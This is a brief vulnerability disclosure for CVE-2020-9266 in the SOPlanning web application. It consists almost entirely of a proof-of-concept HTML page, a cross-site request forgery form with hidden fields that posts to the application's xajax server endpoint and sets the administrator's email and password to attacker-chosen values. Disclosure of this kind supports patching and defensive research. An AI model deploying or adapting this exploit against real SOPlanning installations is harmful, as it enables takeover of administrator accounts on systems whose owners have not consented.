CVE-2020-9266
The SOPlanning website is vulnerable to CSRF that would allow for the admin password to be changed:
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST">
<input type="hidden" name="xajax" value="submitFormProfil" />
<input type="hidden" name="xajaxr" value="1581702103306" />
<input type="hidden" name="xajaxargs[]" value="ADM" />
<input type="hidden" name="xajaxargs[]" value="test@test.com" />
<input type="hidden" name="xajaxargs[]" value="admin123" />
<input type="hidden" name="xajaxargs[]" value="fr" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="true" />
<input type="hidden" name="xajaxargs[]" value="false" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>